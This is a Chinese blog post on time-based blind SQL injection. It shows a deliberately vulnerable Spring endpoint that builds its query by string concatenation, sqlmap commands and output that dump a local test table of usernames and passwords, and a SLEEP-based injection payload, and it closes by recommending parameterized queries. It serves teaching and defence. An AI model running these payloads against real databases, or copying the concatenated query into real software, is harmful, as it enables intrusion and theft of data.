SQL注入:时间盲注

最新推荐文章于 2024-08-09 09:06:05 发布
最新推荐文章于 2024-08-09 09:06:05 发布
阅读量277 收藏 5
点赞数 8
文章标签: sql sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jc0803kevin/article/details/140374937
版权

SQL注入:时间盲注

SQL 时间盲注是一种利用数据库的延迟来判断查询结果的技术。主要用到sleep() 函数

前面讲到基于错误注入,对应的接口没有返回值不能继续下去,但是如果接口有返回值呢?

先决条件

  • 进行了统一异常处理
  • 采用字符串拼接的方式
  • 访问的接口有对应的返回值
@PostMapping("wrong")
    public List wrong(@RequestParam("username") String username) {
        //curl -X POST http://localhost:18081/time-based/wrong?username=test
        //python sqlmap.py -u  http://localhost:18081/time-based/wrong --data username=test --current-db --flush-session
        //python sqlmap.py -u  http://localhost:18081/time-based/wrong --data username=test --tables -D "sqlinject"
        //python sqlmap.py -u  http://localhost:18081/time-based/wrong --data username=test -D "sqlinject" -T "users_time" --dump

        List list = jdbcTemplate.queryForList("SELECT id,username FROM users_time WHERE username LIKE '%" + username + "%'");
        log.info("{}", list);

        return list;
    }

使用sqlmap进行注入攻击

C:\Python310\sqlmap>python sqlmap.py -u  http://localhost:18081/time-based/wrong --data username=test -D "sqlinject" -T "users_time" --dump
...........................

# 可以看到提示 time-based blind 可以进行注入
[09:48:54] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
............................................
[09:49:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[09:49:03] [INFO] fetching columns for table 'users_time' in database 'sqlinject'
[09:49:03] [INFO] fetching entries for table 'users_time' in database 'sqlinject'
Database: sqlinject
Table: users_time
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | haha1    | test1    |
| 2  | haha2    | test2    |
| 3  | 123456   | kevin    |
+----+----------+----------+

[09:49:04] [INFO] table 'sqlinject.users_time' dumped to CSV file 'C:\Users\admin\AppData\Local\sqlmap\output\localhost\dump\sqlinject\users_time.csv'


C:\Python310\sqlmap>

可以看到,可以将完整的库拖下来,注入攻击成功了。

Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=test%' AND (SELECT 1974 FROM (SELECT(SLEEP(5)))sXjh) AND 'gPKK%'='gPKK
  • 注入的过程,就是枚举字符,暴力破解

从查询结果中截取第一个字符,转换成ASCLL码,从32开始判断,递增至126。

如果响应时间超过5秒,说明字符内容判断正确;
如果响应时间不超过5秒(正常响应),说明字符内容判断错误,递增猜解该字符的其他可能性。

第一个字符猜解成功后,依次猜解第二个、第三个……第n个(n表示返回结果的长度)。

所以即使屏蔽了错误信息,也不能达到防止注入。最优的解决办法还是要参数化,采用占位符的信息替换。

jc0803kevin
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Web安全:SQL注入时间盲注原理+步骤+实战操作
wangyuxiang946的博客
05-21 2262
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
sql注入时间盲注
weixin_46954909的博客
04-02 988
sql注入的整型字符型注入,联合注入,报错注入以及布尔盲注可参考,往期。
sqlmap基于时间盲注判断原理
热门推荐
think_ycx的专栏
08-01 1万+
本文永久链接 检测入口: lib/controller/checks.pycheckSqlInjection函数中: elifmethod == PAYLOAD.METHOD.TIME: # Perform the test's request trueResult = Request.queryPage(reqPayload, place, timeBa...
SQL注入-时间盲注
dkxkl1314的博客
03-11 791
盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注时间忙住特性在页面中,不管用户输入什么,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。如下图不管我们输入什么,页面显示结果都是一样的1、判断是否存在注入2、获取数据库长度3、逐字猜解数据库名4、猜解表名数量5、猜解某个表名长度6、逐字猜解表名。
SQL注入:布尔盲注时间盲注——CTFHUB 使用Burpsuite进行半自动注入
PigletTT的博客
07-10 2361
SQL注入:布尔盲注时间盲注——CTFHUB为例 一、原理 1.布尔盲注 ​ 布尔盲注一般在页面只会显示正确和错误两种显示,因此在这种情况下我们不知道如何去获取数据库的详细内容,包括当前所在的数据库,数据库里面的表以及每个表的字段和内容了。在这种情况下需要借助一些特别的函数来判断注入的语句是否正确,从而获取数据库的信息。以下函数是进行盲注时常用的函数 length(str) //返回str字符串的长度。 1 and length(database())=4 //判断数据库名字的长度是否为4
SQL注入——时间盲注
heyingcheng的博客
03-07 1112
web页面只返回一个正常页面。利用,逐个猜解数据。但是前提是数据库会执行命令代码,只是不反馈页面信息。回顾:当页面有回显选择当页面没有回显但是有报错信息选择当页面既没有回显也没有报错,但是有页面真假值,选择没有回显,没有报错,没有页面真假值,选择。
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 3579
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
SQL注入时间盲注
banliyaoguai的博客
05-20 454
盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。对于基于时间盲注来说,我们构造的语句中,包含了能否影响系统运行时间的函数,根据每次页面返回的时间,判断注入的语句是否被成功执行。
SQL注入盲注
qq_68163788的博客
01-28 1459
SQL盲注是一种利用程序对数据库进行恶意攻击的方法。盲注是一种基于布尔逻辑的注入技术,攻击者利用程序对数据库进行恶意注入,通过不断尝试和观察程序的返回结果,来推断数据库中的数据信息。盲注通常分为盲注时间盲注布尔两种类型,攻击者利用这两种类型的盲注来逐步获取数据库中的信息,例如表名、字段名、数据内容等。盲注是一种常见的SQL注入攻击方式,对于程序开发者来说,需要在开发过程中注意防范SQL注入漏洞,例如使用参数化查询、输入验证等方式来防止SQL注入攻击。
2024年Python最全Python自动化sql注入:布尔盲注_布尔盲注脚本
2301_82244514的博客
04-30 445
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
网络安全原理与应用:SQL盲注.pptx
05-16
与传统的SQL注入不同,盲注并不直接显示注入语句的执行结果,而是依赖于应用程序的响应时间或输出状态来推断信息。这使得攻击过程更加复杂,需要更多的技巧和耐心。 1. **基于布尔的盲注** 布尔盲注依赖于查询结果...
SQL注入手动盲注案例
05-30
### SQL注入手动盲注案例详解 #### 一、SQL注入概念 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在应用程序的输入字段中插入恶意SQL语句来操纵或窃取数据库中的信息。手动盲注是一种高级技巧,适用于...
SQL注入(+盲注).txt
10-13
SQL注入(+盲注).txt
计算机病毒与防护:SQL盲注原理.ppt
06-10
SQL盲注,全称为SQL Blind Injection,是一种针对Web应用程序的攻击方式,通过探测和利用程序中的SQL注入漏洞,攻击者可以在不知道数据库源代码的情况下,逐步获取数据库信息。此技术主要依赖于对服务器响应的观察和...
SQL Server中CPU使用率过高的排查
主宰
08-05 294
如果sqlserver进程导致CPU使用率过高,则最常见的原因是执行表或索引扫描的查询,其次是排序、哈希操作和循环 (嵌套循环运算符或 WHILE (T-SQL) )。对于安装了sqlserver的服务器,可以先看下任务管理器中sqlserver对cpu的占用情况,确定是否是sqlserver导致cpu消耗过高。从输出中具有最高improvement_measure值的前5或10条建议开始。这些索引对性能有最显著的积极影响。使用以下查询检查是否缺少索引,并应用具有高改进度量值的任何建议索引。
SQL回顾
Wincreds的博客
08-05 432
②Cookie 是一种客户端的存储技术,用于在浏览器中存储少量数据。参数包含在请求体中,可以是键值对格式或其他格式,如 JSON。①Session 是一种服务器端的存储技术,用于在用户与网站的交互期间保持用户状态。会话数据通常存储在服务器上的文件或数据库中,可以永久存储用户信息,直到会话过期或被清除。会看到结果,正确密码,与其他的长度不一样,由于网站机制,防爬机制,这里我把密码从666改为了8,节约访问次数。旧密码无所谓,利用 admin’# ,进行修改,修改密码实际上修改的是admin的密码。
[SWPUCTF 2021 新生赛]easy_sql
2301_80218721的博客
08-05 365
这个文章讲的东西基本可以够我去理解一些基本的思路和做法,然后文章里面还附带了一些基本的演示。然后我这里直接就是照着那个文章的思路去写的题目。转web之后第一次做sql,还不是很懂。然后就得到了flag。
SQL Server 事务
最新发布
a876106354的博客
08-09 313
SQL Server 事务是数据库操作的一个基本特性,它允许你将一系列数据库操作组合成一个原子单元,这个单元中的所有操作要么全部成功,要么全部失败。事务具有以下四个重要的属性,通常被称为ACID属性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jc0803kevin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值